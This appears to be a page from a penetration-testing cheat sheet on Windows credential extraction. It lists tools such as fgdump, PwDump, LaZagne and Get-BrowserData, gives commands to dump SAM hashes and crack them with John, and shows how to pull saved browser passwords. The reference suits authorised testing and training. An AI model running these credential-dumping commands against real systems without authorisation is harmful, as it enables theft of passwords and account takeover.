Other Tools / Techniques

credential editor

This tool can be used to extract credentials from the memory. Download it from:

fgdump

Extract credentials from the SAM file. You can find this binary inside Kali, just do:

 locate fgdump.exe

then run it on windows:

fgdump.exe

PwDump

Extract credentials from the SAM file

You can find this binary inside Kali, just do:

locate pwdump.exe

run it on windows with:

PwDump.exe -o outpwdump -x 127.0.0.1
type outpwdump

Generate a hash file for John using pwdump or samdump2

pwdump SYSTEM SAM > /root/sam.txt
samdump2 SYSTEM SAM -o sam.txt

Then crack it with:

john -format=NT /root/sam.txt

PwDump7

Lazagne

lazagne.exe all

get-browserdata(powershell)

Get-BrowserData.ps1 | Format-List

Last updated